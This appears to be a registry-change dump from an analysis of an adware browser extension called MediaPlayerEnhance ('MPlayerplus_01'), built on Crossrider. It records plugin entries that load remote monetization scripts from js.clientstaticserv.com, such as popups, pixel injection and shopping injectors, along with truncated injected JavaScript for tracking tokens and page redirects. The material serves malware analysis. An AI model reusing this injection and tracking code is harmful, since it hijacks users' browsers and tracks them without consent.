"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se4&"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appA3&"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"URL" = "http://js.clientstaticserv.com/plugins/mins/hooks.js"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBrowserEvents.js"
[HKCU\Software\MPlayerplus_01\Plugins\72]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\182]
"Name" = "openUrl"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"Name" = "hooks"
[HKCU\Software\MPlayerplus_01]
"ActiveAppId" = "54246"
[HKCU\Software\MPlayerplus_01\Plugins\94]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEPopup.js"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\MPlayerplus_01\Plugins\233]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/revizer_p_dynamic_b2b_2_m.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Plugins\182]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]&"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"Version" = "1"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/price_gong_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
[HKCU\Software\MPlayerplus_01\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){A&"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'cltuzvozei'); }"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\MPlayerplus_01\Manifest]
"ThanksUrl" = "NA"
[HKCU\Software\MPlayerplus_01\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"Version" = "9"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Update]
"LastCheck" = "1413862433"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"Name" = "CrossriderInfo"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\103]
"Name" = "intext_5_m"
[HKCU\Software\MPlayerplus_01\Plugins\155]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/ibario_pops_m.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"RunInFrame" = "false"
[HKCU\Software\MPlayerplus_01\Plugins\190]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/pops_5_m.js"
[HKCU\Software\MPlayerplus_01\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,93,102,103,104,155,184,190,191,220,195,211,221,233,242,244,253,177,91,28"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length
[HKCU\Software\MPlayerplus_01\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===nM'"
[HKCU\Software\MPlayerplus_01\Plugins\177]
"URL" = "http://js.clientstaticserv.com/plugins/mins/crossriderDashboard.js"
[HKCU\Software\MPlayerplus_01\Installer]
"zdata" = "0"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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'"
[HKCU\Software\MPlayerplus_01\Code]
"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { //alert(appAPI.isMatchPages(*youtube*)); //alert(appAPI.isMatchPages(*watch*)); //alert(appAPI.isMatchPages(*hd=1*)) if (appAPI.isMatchPages(*youtube*) && appAPI.isMatchPages(*watch*) && !appAPI.isMatchPages(*hd=1*)) { //alert(window.location); window.location = window.location &hd=1"
[HKCU\Software\MPlayerplus_01\Plugins\155]
"Name" = "ibario_pops_m"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'jsjfhyptbt'); }"
[HKCU\Software\MPlayerplus_01\Plugins\47]
"Name" = "resources_background"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""
[HKCU\Software\MPlayerplus_01\Plugins\47]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\207]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac'"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\MPlayerplus_01\Installer]
"FullVersion" = "1.34.5.12"
[HKCU\Software\MPlayerplus_01\Plugins\246]
"Name" = "setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\MPlayerplus_01\Plugins\191]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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'"
[HKCU\Software\MPlayerplus_01\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/dealply_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\1]
"Name" = "base"
[HKCU\Software\MPlayerplus_01\Plugins\183]
"Name" = "tabsWrapper"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/icm_convertmedia_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"Version" = "9"
[HKCU\Software\MPlayerplus_01\Plugins\21]
"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,E'"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[104] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(104, [shopping])){ return; } var app_id='0'; var uid='0'; var app_name = ''; try{app_name = '&name=' encodeURIComponent(appAPI.appInfo.name);} catch(e) {app_name='';} try{app_id = appAPI.appInfo.id;}catch(err){} if (appAPI && appAPI.installer && appAPI.installer.getParams) { app_id = appAPI.installer.getParams().source_id; } if(appAPI && appAPI.installer && appAPI.installer.getUserId){uid=appAPI.installer.getUserId();} var token = appAPI.db.get(jw_token); if(token === '' || token===null || token === undefined){ var S4 = function() {return (((1 Math.random())*0x10000)|0).toString(16).substring(1);}; token=(S4() S4() - S4() - S4() - S4() - S4() S4() S4()); appAPI.db.set(jw_token,toke'"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"Version" = "46"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderUtils.js"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"Name" = "ie8_fix_1"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBackground.js"
[HKCU\Software\MPlayerplus_01\Plugins\183]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi.'"
[HKCU\Software\MPlayerplus_01\Plugins\41]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"Version" = "11"
[HKCU\Software\MPlayerplus_01\Manifest]
"homepageurl" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\182]
"URL" = "http://js.clientstaticserv.com/plugins/mins/openUrl.js"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"URL" = "http://js.clientstaticserv.com/plugins/mins/searchengines_hook.js"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/monetizationLoader.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEDatabase.js"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\MPlayerplus_01\Manifest]
"PluginsManifestVersion" = "27"
[HKCU\Software\MPlayerplus_01\Installer]
"srcid" = "001359"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Manifest]
"ModeType" = "production"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\MPlayerplus_01\Plugins\45]
"Name" = "IEOnRequest"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"Version" = "9"
[HKCU\Software\MPlayerplus_01\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"Name" = "IEBackground"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 41 CE 2B BB 4C A3 24 E4 2A CD 47 B6 97 AF AC"
[HKCU\Software\MPlayerplus_01\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"
[HKCU\Software\MPlayerplus_01\Plugins\22]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\28]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\64]
"URL" = "http://js.clientstaticserv.com/plugins/mins/appApiMessage.js"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"Name" = "ie8_fix_2"
[HKCU\Software\MPlayerplus_01\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"Name" = "IEDatabase"
[HKCU\Software\MPlayerplus_01\Plugins\1]
"Version" = "10"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"Version" = "8"
[HKCU\Software\MPlayerplus_01\Manifest]
"EnableSearchIE" = "false"
[HKCU\Software\MPlayerplus_01\Plugins\21]
"Name" = "debug"
[HKCU\Software\MPlayerplus_01\Plugins\44]
"Name" = "IEMisc"
[HKCU\Software\MPlayerplus_01\Plugins\103]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/intext_5_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\40]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEExtension.js"
[HKCU\Software\MPlayerplus_01\Plugins\191]
"Name" = "ciuvo_m"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\191]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/ciuvo_m.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Plugins\182]
"Version" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"Version" = "9"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\MPlayerplus_01\Plugins\22]
"Name" = "resources"
[HKCU\Software\MPlayerplus_01\Plugins\1]
"URL" = "http://js.clientstaticserv.com/plugins/mins/base.js"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_1.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"Version" = "33"
[HKCU\Software\MPlayerplus_01\Installer]
"DefaultBrowser" = "ie"
[HKCU\Software\MPlayerplus_01\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Installer]
"osName" = "XP32"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\41]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInfo.js"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"Name" = "engageya_inner_m"
[HKCU\Software\MPlayerplus_01\Manifest]
"SetNewTab" = "false"
"Manifest" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"Version" = "6"
[HKCU\Software\MPlayerplus_01\Plugins\103]
"Version" = "8"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\233]
"Name" = "revizer_p_dynamic_b2b_2_m"
[HKCU\Software\MPlayerplus_01\Manifest]
"PublisherName" = "Freeven"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\MPlayerplus_01\Plugins\72]
"Name" = "appApiValidation"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"Name" = "set_campaign_id_m"
[HKCU\Software\MPlayerplus_01\Installer]
"StatsDomain" = "http://stats.clientstaticserv.com"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"Name" = "icm_base_m"
[HKCU\Software\MPlayerplus_01\Plugins\207]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\44]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMisc.js"
[HKCU\Software\MPlayerplus_01\Installer]
"FullVersionForUrl" = "1_34_05_12"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"Name" = "jollywallet_m"
[HKCU\Software\MPlayerplus_01\Plugins\28]
"URL" = "http://js.clientstaticserv.com/plugins/mins/initializer.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"UninstallerOfferUrl" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\190]
"Name" = "pops_5_m"
[HKCU\Software\MPlayerplus_01\Manifest]
"Description" = "MediaPlayerEnhance Extension"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Manifest]
"DisableIe" = "true"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInternal.js"
[HKCU\Software\MPlayerplus_01\Plugins\207]
"URL" = "http://js.clientstaticserv.com/plugins/mins/dbWrapper.js"
[HKCU\Software\MPlayerplus_01\Plugins\177]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\22]
"URL" = "http://js.clientstaticserv.com/plugins/mins/resources.js"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"Version" = "25"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"Name" = "pixel_inject"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"Version" = "8"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"URL" = "http://js.clientstaticserv.com/plugins/mins/pixel_inject.js"
[HKCU\Software\MPlayerplus_01\Plugins\45]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMessaging.js"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"Name" = "revizer_ws_dynamic_b2b_light_m"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"Name" = "icm_convertmedia_m"
[HKCU\Software\MPlayerplus_01\Plugins\190]
"Version" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\MPlayerplus_01\Plugins\45]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEOnRequest.js"
[HKCU\Software\MPlayerplus_01\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,93,102,155,184,191,220,195,211,221,226,233,242,244,253,91"
[HKCU\Software\MPlayerplus_01\Manifest]
"ChangePrevious" = "false"
[HKCU\Software\MPlayerplus_01\Plugins\47]
"URL" = "http://js.clientstaticserv.com/plugins/mins/resources_background.js"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/noproblemppc_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"URL" = "http://js.clientstaticserv.com/plugins/mins/jQuery.js"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"Version" = "6"
[HKCU\Software\MPlayerplus_01\Installer]
